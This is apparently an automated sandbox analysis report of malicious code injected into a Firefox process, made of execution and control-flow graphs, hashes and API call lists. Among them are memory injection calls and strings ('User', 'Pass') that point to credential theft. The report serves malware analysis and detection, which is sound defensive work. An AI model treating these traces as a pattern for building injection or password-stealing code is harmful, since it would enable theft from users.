5183->5180 5183->5189 5197 1bf400023f2 5183->5197 5185 1bf400062d4 5209 1bf40002552 5185->5209 5186 1bf4000628c 5205 1bf40002652 5186->5205 5189->5171 5190 1bf40002652 LdrLoadDll 5190->5189 5191->5185 5191->5186 5192 1bf400062fc 5192->5190 5194 1bf400024a3 5193->5194 5195 1bf4000248c 5193->5195 5194->5178 5196 1bf40005412 LdrLoadDll 5195->5196 5196->5194 5198 1bf40002434 5197->5198 5199 1bf4000241b 5197->5199 5198->5180 5200 1bf40005412 LdrLoadDll 5199->5200 5200->5198 5202 1bf4000260a 5201->5202 5204 1bf40002621 5201->5204 5203 1bf40005412 LdrLoadDll 5202->5203 5203->5204 5204->5191 5206 1bf4000269d 5205->5206 5207 1bf40002684 5205->5207 5206->5189 5208 1bf40005412 LdrLoadDll 5207->5208 5208->5206 5210 1bf40002559 5209->5210 5211 1bf4000259e 5210->5211 5212 1bf40005412 LdrLoadDll 5210->5212 5211->5192 5212->5211 5459 1bf3fffd363 5460 1bf3fffd367 5459->5460 5461 1bf40005412 LdrLoadDll 5460->5461 5462 1bf3fffd3a0 5461->5462 5213 1bf400078e5 5214 1bf400078f7 5213->5214 5217 1bf400076f2 5214->5217 5216 1bf400078fc 5218 1bf40007707 5217->5218 5220 1bf40006762 5217->5220 5218->5216 5221 1bf4000676b 5220->5221 5222 1bf40006770 5221->5222 5226 1bf4000677c 5221->5226 5223 1bf40003f12 LdrLoadDll 5222->5223 5224 1bf40006775 5223->5224 5224->5218 5225 1bf400068fa 5225->5218 5226->5225 5227 1bf400020a2 LdrLoadDll 5226->5227 5228 1bf400067dc 5227->5228 5228->5225 5229 1bf3fffe362 LdrLoadDll 5228->5229 5230 1bf400067ec 5229->5230 5230->5225 5231 1bf4000680d 5230->5231 5233 1bf4000681a 5230->5233 5234 1bf40006815 5230->5234 5232 1bf400048a2 LdrLoadDll 5231->5232 5232->5234 5233->5234 5235 1bf3fffd4b2 LdrLoadDll 5233->5235 5234->5225 5239 1bf40000812 3 API calls 5234->5239 5236 1bf40006835 5235->5236 5237 1bf400048a2 LdrLoadDll 5236->5237 5238 1bf4000683d 5237->5238 5240 1bf40006894 5238->5240 5245 1bf4000685f 5238->5245 5241 1bf400068d9 5239->5241 5244 1bf3fffd372 LdrLoadDll 5240->5244 5242 1bf40005412 LdrLoadDll 5241->5242 5243 1bf400068f6 ExitProcess 5242->5243 5244->5234 5246 1bf400034e2 LdrLoadDll 5245->5246 5247 1bf40006872 5246->5247 5247->5218 5248 1bf400023e6 5249 1bf40002434 5248->5249 5250 1bf4000241b 5248->5250 5251 1bf40005412 LdrLoadDll 5250->5251 5251->5249 5252 1bf400076e8 5253 1bf40006762 4 API calls 5252->5253 5254 1bf40007707 5253->5254 5463 1bf40000b69 5464 1bf40000b6e 5463->5464 5467 1bf400034e2 LdrLoadDll 5464->5467 5468 1bf40000c18 5464->5468 5465 1bf40005412 LdrLoadDll 5466 1bf40000c35 5465->5466 5467->5468 5468->5465 5255 1bf3fffd0ee 5256 1bf3fffd109 5255->5256 5260 1bf3fffd1af 5255->5260 5257 1bf3fffd012 LdrLoadDll 5256->5257 5258 1bf3fffd118 5257->5258 5259 1bf40005a52 LdrLoadDll 5258->5259 5259->5260 5473 1bf3fffdf6e 5474 1bf3fffdf91 5473->5474 5477 1bf3fffdfaa 5473->5477 5475 1bf3fffd0f2 LdrLoadDll 5474->5475 5476 1bf3fffdf99 5475->5476 5559 1bf3fffdcaf 5560 1bf3fffdcdb 5559->5560 5561 1bf3fffdd49 5559->5561 5560->5561 5562 1bf40004d02 2 API calls 5560->5562 5563 1bf3fffdd16 5562->5563 5564 1bf3fffdd45 5563->5564 5566 1bf3fffd902 2 API calls 5563->5566 5564->5561 5565 1bf40004d02 2 API calls 5564->5565 5569 1bf3fffdd6a 5565->5569 5567 1bf3fffdd36 5566->5567 5567->5564 5568 1bf3fffd7d2 2 API calls 5567->5568 5568->5564 5569->5561 5570 1bf400034e2 LdrLoadDll 5569->5570 5571 1bf3fffddd0 5570->5571 5572 1bf40005412 LdrLoadDll 5571->5572 5572->5561 5478 1bf3fffd272 5479 1bf40005412 LdrLoadDll 5478->5479 5482 1bf3fffd2aa 5479->5482 5480 1bf3fffd34e 5482->5480 5484 1bf3fffd0f2 LdrLoadDll 5482->5484 5485 1bf3fffdcb2 5482->5485 5499 1bf400045b2 5482->5499 5484->5482 5486 1bf3fffdcdb 5485->5486 5498 1bf3fffdd49 5485->5498 5487 1bf40004d02 2 API calls 5486->5487 5486->5498 5488 1bf3fffdd16 5487->5488 5489 1bf3fffdd45 5488->5489 5505 1bf3fffd902 5488->5505 5490 1bf40004d02 2 API calls 5489->5490 5489->5498 5494 1bf3fffdd6a 5490->5494 5492 1bf3fffdd36 5492->5489 5514 1bf3fffd7d2 5492->5514 5495 1bf400034e2 LdrLoadDll 5494->5495 5494->5498 5496 1bf3fffddd0 5495->5496 5497 1bf40005412 LdrLoadDll 5496->5497 5497->5498 5498->5482 5501 1bf400045e8 5499->5501 5500 1bf40004648 5503 1bf40005a52 LdrLoadDll 5500->5503 5504 1bf400046a9 5500->5504 5501->5500 5502 1bf40005a52 LdrLoadDll 5501->5502 5502->5501 5503->5500 5504->5482 5506 1bf3fffdca0 5505->5506 5507 1bf3fffd92a 5505->5507 5506->5492 5507->5506 5508 1bf40004d02 2 API calls 5507->5508 5510 1bf3fffda79 5508->5510 5509 1bf3fffdc5f 5509->5492 5510->5509 5511 1bf40004d02 2 API calls 5510->5511 5512 1bf3fffdc49 5511->5512 5513 1bf40004d02 2 API calls 5512->5513 5513->5509 5515 1bf3fffd7f0 5514->5515 5516 1bf3fffd804 5514->5516 5515->5489 5517 1bf40004d02 2 API calls 5516->5517 5518 1bf3fffd8c6 5517->5518 5518->5489 5573 1bf3fffd4b3 5574 1bf3fffd52a 5573->5574 5575 1bf400034e2 LdrLoadDll 5574->5575 5576 1bf3fffd53a 5575->5576 5577 1bf400034e2 LdrLoadDll 5576->5577 5588 1bf3fffd61b 5576->5588 5578 1bf3fffd55e 5577->5578 5579 1bf40005412 LdrLoadDll 5578->5579 5578->5588 5580 1bf3fffd587 5579->5580 5581 1bf40005412 LdrLoadDll 5580->5581 5582 1bf3fffd5ab 5581->5582 5583 1bf40005412 LdrLoadDll 5582->5583 5584 1bf3fffd5cf 5583->5584 5585 1bf40005412 LdrLoadDll 5584->5585 5586 1bf3fffd5f7 5585->5586 5587 1bf40005412 LdrLoadDll 5586->5587 5587->5588 5360 1bf40005637 5362 1bf40005538 5360->5362 5364 1bf4000563f 5360->5364 5361 1bf4000553d 5362->5361 5363 1bf40005982 LdrLoadDll 5362->5363 5363->5361 5365 1bf400056e2 5364->5365 5366 1bf400034e2 LdrLoadDll 5364->5366 5367 1bf4000571d 5366->5367 5367->5365 5369 1bf40006a32 LdrLoadDll 5367->5369 5370 1bf40005783 5367->5370 5368 1bf40005801 5369->5370 5370->5368 5371 1bf40005982 LdrLoadDll 5370->5371 5371->5368 5261 1bf3fffd8fb 5262 1bf3fffdca0 5261->5262 5263 1bf3fffd92a 5261->5263 5263->5262 5264 1bf40004d02 2 API calls 5263->5264 5266 1bf3fffda79 5264->5266 5265 1bf3fffdc5f 5266->5265 5267 1bf40004d02 2 API calls 5266->5267 5268 1bf3fffdc49 5267->5268 5269 1bf40004d02 2 API calls 5268->5269 5269->5265 5372 1bf4000473b 5373 1bf40003672 LdrLoadDll 5372->5373 5374 1bf400047ba 5373->5374 5270 1bf400002ff 5271 1bf40000496 5270->5271 5272 1bf4000031b 5270->5272 5272->5271 5273 1bf40005412 LdrLoadDll 5272->5273 5274 1bf40000343 5273->5274 5275 1bf40005412 LdrLoadDll 5274->5275 5276 1bf40000360 5275->5276 5277 1bf40005412 LdrLoadDll 5276->5277 5278 1bf4000037d 5277->5278 5279 1bf40005412 LdrLoadDll 5278->5279 5280 1bf4000039a 5279->5280 5281 1bf40005412 LdrLoadDll 5280->5281 5282 1bf400003b7 5281->5282 5283 1bf40005412 LdrLoadDll 5282->5283 5284 1bf400003d4 5283->5284 5285 1bf40005412 LdrLoadDll 5284->5285 5286 1bf400003f1 5285->5286 5287 1bf40005412 LdrLoadDll 5286->5287 5288 1bf4000040e 5287->5288 5289 1bf40005412 LdrLoadDll 5288->5289 5290 1bf4000042b 5289->5290 5291 1bf40005412 LdrLoadDll 5290->5291 5292 1bf40000448 5291->5292 5293 1bf40005412 LdrLoadDll 5292->5293 5294 1bf40000465 5293->5294 5295 1bf40005412 LdrLoadDll 5294->5295 5296 1bf40000482 5295->5296 5593 1bf3fffd1bf 5594 1bf3fffd1df 5593->5594 5595 1bf3fffd267 5593->5595 5596 1bf3fffd208 5594->5596 5597 1bf3fffdcb2 2 API calls 5594->5597 5596->5595 5598 1bf400045b2 LdrLoadDll 5596->5598 5597->5596 5599 1bf3fffd25f 5598->5599 5600 1bf3fffd0f2 LdrLoadDll 5599->5600 5600->5595 5297 1bf3ffff100 5298 1bf3ffff12d 5297->5298 5299 1bf400020a2 LdrLoadDll 5298->5299 5300 1bf3ffff14a 5299->5300 5301 1bf400034e2 LdrLoadDll 5300->5301 5304 1bf3ffff1bb 5300->5304 5302 1bf3ffff19b 5301->5302 5303 1bf40005412 LdrLoadDll 5302->5303 5303->5304 5375 1bf40004c40 5376 1bf40004c5c 5375->5376 5377 1bf40005412 LdrLoadDll 5376->5377 5380 1bf40004cb0 5376->5380 5378 1bf40004c87 5377->5378 5379 1bf40005412 LdrLoadDll 5378->5379 5379->5380 5519 1bf40005980 5520 1bf40005642 LdrLoadDll 5519->5520 5522 1bf40005997 5520->5522 5521 1bf40005412 LdrLoadDll 5523 1bf40005a11 5521->5523 5522->5521 5522->5523 5524 1bf3ffffa81 5525 1bf3fffd4b2 LdrLoadDll 5524->5525 5526 1bf3ffffa94 5525->5526 5535 1bf400015e2 5526->5535 5529 1bf3fffd0f2 LdrLoadDll 5530 1bf3ffffaa4 5529->5530 5531 1bf40005412 LdrLoadDll 5530->5531 5533 1bf3ffffaf1 5531->5533 5532 1bf3ffffb17 5533->5532 5541 1bf3fffd1c2 5533->5541 5536 1bf40001623 5535->5536 5537 1bf40001492 LdrLoadDll 5536->5537 5538 1bf40001698 5537->5538 5539 1bf400024d2 LdrLoadDll 5538->5539 5540 1bf3ffffa9c 5539->5540 5540->5529 5542 1bf3fffd1df 5541->5542 5543 1bf3fffd267 5541->5543 5544 1bf3fffdcb2 2 API calls 5542->5544 5545 1bf3fffd208 5542->5545 5543->5533 5544->5545 5545->5543 5546 1bf400045b2 LdrLoadDll 5545->5546 5547 1bf3fffd25f 5546->5547 5548 1bf3fffd0f2 LdrLoadDll 5547->5548 5548->5543 5601 1bf3ffffdc3 5602 1bf3ffffe0f 5601->5602 5603 1bf3fffff1f 5602->5603 5605 1bf3ffffece 5602->5605 5604 1bf3ffffb22 2 API calls 5603->5604 5607 1bf3fffff12 5604->5607 5606 1bf3ffffb22 2 API calls 5605->5606 5606->5607 5305 1bf40003f06 5306 1bf40003f3b 5305->5306 5307 1bf400020a2 LdrLoadDll 5306->5307 5308 1bf40003f44 5307->5308 5309 1bf40005412 LdrLoadDll 5308->5309 5337 1bf40004422 5308->5337 5310 1bf40003fe5 5309->5310 5311 1bf40005412 LdrLoadDll 5310->5311 5312 1bf4000400d 5311->5312 5313 1bf40005412 LdrLoadDll 5312->5313 5312->5337 5314 1bf40004052 5313->5314 5315 1bf40005412 LdrLoadDll 5314->5315 5317 1bf400040af 5315->5317 5316 1bf400040bf 5317->5316 5318 1bf40005412 LdrLoadDll 5317->5318 5319 1bf40004132 5318->5319 5319->5316 5320 1bf40004160 5319->5320 5321 1bf400041ab 5319->5321 5324 1bf40003cb2 LdrLoadDll 5320->5324 5322 1bf40005412 LdrLoadDll 5321->5322 5323 1bf400041cc 5322->5323 5326 1bf400041dd 5323->5326 5327 1bf40005412 LdrLoadDll 5323->5327 5325 1bf4000419f 5324->5325 5328 1bf4000422a 5327->5328 5329 1bf40005412 LdrLoadDll 5328->5329 5330 1bf4000425a 5329->5330 5331 1bf40004335 5330->5331 5332 1bf3fffeb22 LdrLoadDll 5330->5332 5334 1bf400042e2 5330->5334 5333 1bf40003a82 LdrLoadDll 5331->5333 5332->5331 5333->5334 5335 1bf40005412 LdrLoadDll 5334->5335 5338 1bf40004376 5334->5338 5335->5338 5336 1bf40005412 LdrLoadDll 5336->5337 5338->5336 5339 1bf40007909 5340 1bf4000790e 5339->5340 5341 1bf400076f2 4 API calls 5340->5341 5342 1bf40007913 5341->5342 5549 1bf4000698a 5550 1bf400069b3 5549->5550 5554 1bf400069a6 5549->5554 5551 1bf40005412 LdrLoadDll 5550->5551 5552 1bf400069c9 5551->5552 5553 1bf40005412 LdrLoadDll 5552->5553 5552->5554 5553->5554 5343 1bf4000540c 5344 1bf40005437 5343->5344 5345 1bf4000562b 5343->5345 5346 1bf4000544e 5344->5346 5347 1bf40005982 LdrLoadDll 5344->5347 5347->5346 5612 1bf3fffd7ce 5613 1bf3fffd7f0 5612->5613 5614 1bf3fffd804 5612->5614 5615 1bf40004d02 2 API calls 5614->5615 5616 1bf3fffd8c6 5615->5616 5617 1bf400025ce 5618 1bf40002559 5617->5618 5619 1bf40005412 LdrLoadDll 5618->5619 5620 1bf4000259e 5618->5620 5619->5620 5348 1bf3fffeb17 5349 1bf3fffeb09 5348->5349 5350 1bf3fffe9c2 LdrLoadDll 5349->5350 5355 1bf3fffeb0e 5349->5355 5351 1bf3fffec3f 5350->5351 5352 1bf3fffe9c2 LdrLoadDll 5351->5352 5351->5355 5353 1bf3fffec54 5352->5353 5354 1bf3fffe9c2 LdrLoadDll 5353->5354 5353->5355 5354->5355 5393 1bf40006758 5394 1bf40006762 5393->5394 5395 1bf40006770 5394->5395 5399 1bf4000677c 5394->5399 5396 1bf40003f12 LdrLoadDll 5395->5396 5397 1bf40006775 5396->5397 5398 1bf400068fa 5399->5398 5400 1bf400020a2 LdrLoadDll 5399->5400 5401 1bf400067dc 5400->5401 5401->5398 5402 1bf3fffe362 LdrLoadDll 5401->5402 5403 1bf400067ec 5402->5403 5403->5398 5404 1bf4000680d 5403->5404 5406 1bf4000681a 5403->5406 5407 1bf40006815 5403->5407 5405 1bf400048a2 LdrLoadDll 5404->5405 5405->5407 5406->5407 5408 1bf3fffd4b2 LdrLoadDll 5406->5408 5407->5398 5412 1bf40000812 3 API calls 5407->5412 5409 1bf40006835 5408->5409 5410 1bf400048a2 LdrLoadDll 5409->5410 5411 1bf4000683d 5410->5411 5413 1bf40006894 5411->5413 5418 1bf4000685f 5411->5418 5414 1bf400068d9 5412->5414 5417 1bf3fffd372 LdrLoadDll 5413->5417 5415 1bf40005412 LdrLoadDll 5414->5415 5416 1bf400068f6 ExitProcess 5415->5416 5417->5407 5419 1bf400034e2 LdrLoadDll 5418->5419 5420 1bf40006872 5419->5420 5421 1bf3fffe359 5422 1bf3fffe36b 5421->5422 5423 1bf400034e2 LdrLoadDll 5422->5423 5458 1bf3fffe843 5422->5458 5424 1bf3fffe4b3 5423->5424 5425 1bf40005412 LdrLoadDll 5424->5425 5426 1bf3fffe4d7 5425->5426 5427 1bf40005412 LdrLoadDll 5426->5427 5428 1bf3fffe4ff 5427->5428 5429 1bf40005412 LdrLoadDll 5428->5429 5428->5458 5430 1bf3fffe54a 5429->5430 5431 1bf400034e2 LdrLoadDll 5430->5431 5430->5458 5432 1bf3fffe5a1 5431->5432 5433 1bf400034e2 LdrLoadDll 5432->5433 5434 1bf3fffe5b9 5433->5434 5435 1bf40005412 LdrLoadDll 5434->5435 5436 1bf3fffe5e6 5435->5436 5437 1bf40005412 LdrLoadDll 5436->5437 5438 1bf3fffe613 5437->5438 5439 1bf40005412 LdrLoadDll 5438->5439 5438->5458 5440 1bf3fffe64e 5439->5440 5441 1bf40006992 LdrLoadDll 5440->5441 5442 1bf3fffe662 5441->5442 5443 1bf40003672 LdrLoadDll 5442->5443 5442->5458 5444 1bf3fffe713 5443->5444 5445 1bf40005412 LdrLoadDll 5444->5445 5446 1bf3fffe76e 5445->5446 5447 1bf40005412 LdrLoadDll 5446->5447 5448 1bf3fffe792 5447->5448 5449 1bf40005412 LdrLoadDll 5448->5449 5450 1bf3fffe7b6 5449->5450 5451 1bf40005412 LdrLoadDll 5450->5451 5452 1bf3fffe7da 5451->5452 5453 1bf40005412 LdrLoadDll 5452->5453 5454 1bf3fffe7fe 5453->5454 5455 1bf40005412 LdrLoadDll 5454->5455 5456 1bf3fffe82f 5455->5456 5457 1bf40006992 LdrLoadDll 5456->5457 5457->5458

                                                                                                                          Executed Functions

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: NamesPrivateProfileSection
                                                                                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                          • API String ID: 709140578-2058692283
                                                                                                                          • Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                          • Instruction ID: 1f36059df53695bb8a53fdadea824b2c300289fb441fd6d8dac262f1a0b1ff63
                                                                                                                          • Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                          • Instruction Fuzzy Hash: 67A1B170A187488BEB28EF6CE8547EEB7E1FB48304F00462DE44AD7286DB7495468789
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 48 1bf40004d02-1bf40004d26 49 1bf40004d2c-1bf40004d30 48->49 50 1bf4000538d-1bf4000539d 48->50 49->50 51 1bf40004d36-1bf40004d70 49->51 52 1bf40004d8f 51->52 53 1bf40004d72-1bf40004d76 51->53 55 1bf40004d96 52->55 53->52 54 1bf40004d78-1bf40004d7c 53->54 56 1bf40004d84-1bf40004d88 54->56 57 1bf40004d7e-1bf40004d82 54->57 58 1bf40004d9b-1bf40004d9f 55->58 56->58 59 1bf40004d8a-1bf40004d8d 56->59 57->55 60 1bf40004da1-1bf40004dc7 call 1bf40005412 58->60 61 1bf40004dc9-1bf40004ddb 58->61 59->58 60->61 65 1bf40004e48 60->65 61->65 66 1bf40004ddd-1bf40004e02 61->66 69 1bf40004e4a-1bf40004e70 65->69 67 1bf40004e71-1bf40004e78 66->67 68 1bf40004e04-1bf40004e0b 66->68 72 1bf40004ea5-1bf40004eac 67->72 73 1bf40004e7a-1bf40004ea3 call 1bf40005412 67->73 70 1bf40004e36-1bf40004e40 68->70 71 1bf40004e0d-1bf40004e30 call 1bf40005412 68->71 70->65 75 1bf40004e42-1bf40004e43 70->75 71->70 77 1bf40004ee0-1bf40004f28 NtCreateFile call 1bf40004c42 72->77 78 1bf40004eae-1bf40004eda call 1bf40005412 72->78 73->65 73->72 75->65 84 1bf40004f2d-1bf40004f2f 77->84 78->65 78->77 84->65 85 1bf40004f35-1bf40004f3d 84->85 85->65 86 1bf40004f43-1bf40004f46 85->86 87 1bf40004f56-1bf40004f5d 86->87 88 1bf40004f48-1bf40004f51 86->88 89 1bf40004f5f-1bf40004f88 call 1bf40005412 87->89 90 1bf40004f92-1bf40004fbc 87->90 88->69 89->65 97 1bf40004f8e-1bf40004f8f 89->97 95 1bf40004fc2-1bf40004fc5 90->95 96 1bf4000537e-1bf40005388 90->96 98 1bf400050d4-1bf400050e1 95->98 99 1bf40004fcb-1bf40004fce 95->99 96->65 97->90 98->69 100 1bf40004fd0-1bf40004fd7 99->100 101 1bf4000502e-1bf40005031 99->101 104 1bf40005008-1bf40005029 100->104 105 1bf40004fd9-1bf40005002 call 1bf40005412 100->105 106 1bf400050e6-1bf400050e9 101->106 107 1bf40005037-1bf40005042 101->107 111 1bf400050b9-1bf400050ca 104->111 105->65 105->104 109 1bf400050ef-1bf400050f6 106->109 110 1bf40005188-1bf4000518b 106->110 112 1bf40005073-1bf40005076 107->112 113 1bf40005044-1bf4000506d call 1bf40005412 107->113 117 1bf40005127-1bf4000513b call 1bf40006992 109->117 118 1bf400050f8-1bf40005121 call 1bf40005412 109->118 114 1bf40005209-1bf4000520c 110->114 115 1bf4000518d-1bf40005194 110->115 111->98 112->65 120 1bf4000507c-1bf40005086 112->120 113->65 113->112 125 1bf40005212-1bf40005219 114->125 126 1bf40005294-1bf40005297 114->126 122 1bf400051c5-1bf40005204 115->122 123 1bf40005196-1bf400051bf call 1bf40005412 115->123 117->65 140 1bf40005141-1bf40005183 117->140 118->65 118->117 120->65 121 1bf4000508c-1bf400050b6 120->121 121->111 145 1bf40005364-1bf40005379 122->145 123->96 123->122 132 1bf4000524a-1bf4000528f 125->132 133 1bf4000521b-1bf40005244 call 1bf40005412 125->133 126->65 129 1bf4000529d-1bf400052a4 126->129 135 1bf400052a6-1bf400052c6 call 1bf40005412 129->135 136 1bf400052cc-1bf400052d3 129->136 132->145 133->96 133->132 135->136 143 1bf400052d5-1bf400052f5 call 1bf40005412 136->143 144 1bf400052fb-1bf40005305 136->144 140->69 143->144 144->96 150 1bf40005307-1bf4000530e 144->150 145->69 150->96 153 1bf40005310-1bf40005356 150->153 153->145
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 823142352-2679148245
                                                                                                                          • Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                          • Instruction ID: 3882ceadf8e91f1d965d76954440f49dc27555a3f52e0010b54731e67ad0e745
                                                                                                                          • Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                          • Instruction Fuzzy Hash: 64224E70618A499FDB99EF2CD8957EAB7E1FB5C301F40022ED05ED3295DB30D4528B89
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 156 1bf40006762-1bf4000676e call 1bf40007802 159 1bf40006770-1bf4000677b call 1bf40003f12 156->159 160 1bf4000677c-1bf40006784 call 1bf40007802 156->160 165 1bf4000678f-1bf40006797 call 1bf40007802 160->165 166 1bf40006786-1bf40006787 160->166 169 1bf40006904-1bf4000690a 165->169 170 1bf4000679d-1bf400067ad call 1bf400021a2 165->170 166->165 173 1bf400068ff-1bf40006900 170->173 174 1bf400067b3-1bf400067ba 170->174 173->169 174->173 175 1bf400067c0-1bf400067de call 1bf40006942 call 1bf400020a2 174->175 175->173 180 1bf400067e4-1bf400067ee call 1bf3fffe362 175->180 180->173 183 1bf400067f4-1bf40006802 180->183 184 1bf400068a4-1bf400068ac 183->184 185 1bf40006808-1bf4000680b 183->185 186 1bf400068fa-1bf400068fb 184->186 187 1bf400068ae-1bf400068b5 call 1bf40006742 184->187 188 1bf4000681a-1bf4000681d 185->188 189 1bf4000680d-1bf40006815 call 1bf400048a2 185->189 186->173 187->186 197 1bf400068b7-1bf400068c9 call 1bf40006742 187->197 188->184 192 1bf40006823-1bf40006826 188->192 189->184 192->184 193 1bf40006828-1bf4000682b 192->193 193->184 196 1bf4000682d-1bf40006847 call 1bf3fffd4b2 call 1bf400048a2 193->196 206 1bf40006894-1bf4000689f call 1bf3ffff302 call 1bf3fffd372 196->206 207 1bf40006849-1bf40006854 call 1bf40006742 196->207 197->186 203 1bf400068cb-1bf400068f8 call 1bf40000812 call 1bf40005412 ExitProcess 197->203 206->184 207->206 216 1bf40006856-1bf4000685d 207->216 216->206 217 1bf4000685f-1bf40006893 call 1bf400034e2 call 1bf40006942 216->217
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                          • Instruction ID: b35c95077c38f9fb93d3de4ffa8e891ec4462dfdd46254ce6405786a3fecdc41
                                                                                                                          • Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                          • Instruction Fuzzy Hash: 80417F30214A444AFBA5BB3C5CA97EB72D2BB5C300F84463D980AD619BCF68D843835A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                          • Instruction ID: df0530d51b6ad1652310c995509517415a9f694fff11f7e11cb67003e0e90d85
                                                                                                                          • Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                          • Instruction Fuzzy Hash: AA01B130608A084BE754E73CECA97EBB2D5FBDC305F40053EA84EC6194EB39D6428646
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:368
                                                                                                                          Total number of Limit Nodes:6

                                                                                                                          Graph

                                                                                                                          execution_graph 8614 229c88b 8615 229c8a6 8614->8615 8633 229bcba 8614->8633 8615->8633 8711 229f3ee 8615->8711 8617 229f4e4 LoadLibraryA 8619 229f533 8617->8619 8620 229f4c2 8620->8617 8621 229c9d5 8623 229cb1e NtAllocateVirtualMemory 8621->8623 8645 229138e 8621->8645 8623->8633 8626 229bbfe 8627 22a2acd 24 API calls 8626->8627 8628 229bc5f 8627->8628 8629 22a2acd 24 API calls 8628->8629 8631 229bc72 8629->8631 8630 22a2acd 24 API calls 8630->8645 8632 22a2acd 24 API calls 8631->8632 8632->8633 8633->8617 8806 229fcc1 GetPEB 8633->8806 8635 229f3ee LoadLibraryA GetPEB 8635->8645 8636 229b695 8636->8626 8639 229b943 NtWriteVirtualMemory 8636->8639 8638 22a14fe GetPEB 8638->8645 8641 229b9e1 8639->8641 8641->8626 8804 22a2acd 8641->8804 8642 2291320 8645->8626 8645->8630 8645->8633 8645->8635 8645->8636 8645->8638 8645->8642 8654 22a1f4c 8645->8654 8655 22a2284 8645->8655 8656 22a322b 24 API calls 8645->8656 8659 22a18ac 8645->8659 8662 22a1490 8645->8662 8706 229f3ca GetPEB 8645->8706 8707 229bd4b 8645->8707 8717 22a06a2 8645->8717 8761 22a322b 8645->8761 8808 22a23e2 8645->8808 8652 22a23e2 NtProtectVirtualMemory 8653 22a23db 8652->8653 8654->8642 8660 22a23e2 NtProtectVirtualMemory 8654->8660 8655->8652 8658 22a3190 NtSetInformationThread 8656->8658 8657 22a23e2 NtProtectVirtualMemory 8657->8642 8658->8645 8659->8657 8661 22a216a 8660->8661 8663 229f3ee 2 API calls 8662->8663 8695 229138e 8663->8695 8664 229f3ee LoadLibraryA GetPEB 8664->8695 8665 22a14fe GetPEB 8665->8695 8666 22a23e2 NtProtectVirtualMemory 8666->8695 8667 22a23e2 NtProtectVirtualMemory 8668 22a23db 8667->8668 8668->8645 8669 22a1f4c 8673 22a23e2 NtProtectVirtualMemory 8669->8673 8685 2291320 8669->8685 8670 22a2284 8670->8667 8671 22a23e2 NtProtectVirtualMemory 8671->8685 8672 22a18ac 8672->8671 8674 22a216a 8673->8674 8674->8645 8675 22a06a2 25 API calls 8675->8695 8676 22a322b 25 API calls 8676->8695 8677 22a1490 25 API calls 8677->8695 8678 22a322b 25 API calls 8679 22a3190 NtSetInformationThread 8678->8679 8679->8695 8680 229f4e4 LoadLibraryA 8682 229f533 8680->8682 8681 229fcc1 GetPEB 8683 229f4c2 8681->8683 8682->8645 8683->8680 8685->8645 8686 229bbfe 8687 22a2acd 25 API calls 8686->8687 8688 229bc5f 8687->8688 8689 22a2acd 25 API calls 8688->8689 8691 229bc72 8689->8691 8690 22a2acd 25 API calls 8690->8695 8692 22a2acd 25 API calls 8691->8692 8693 229bcba 8692->8693 8693->8645 8693->8680 8693->8681 8694 229bd4b 25 API calls 8694->8695 8695->8662 8695->8664 8695->8665 8695->8666 8695->8669 8695->8670 8695->8672 8695->8675 8695->8676 8695->8677 8695->8678 8695->8685 8695->8686 8695->8690 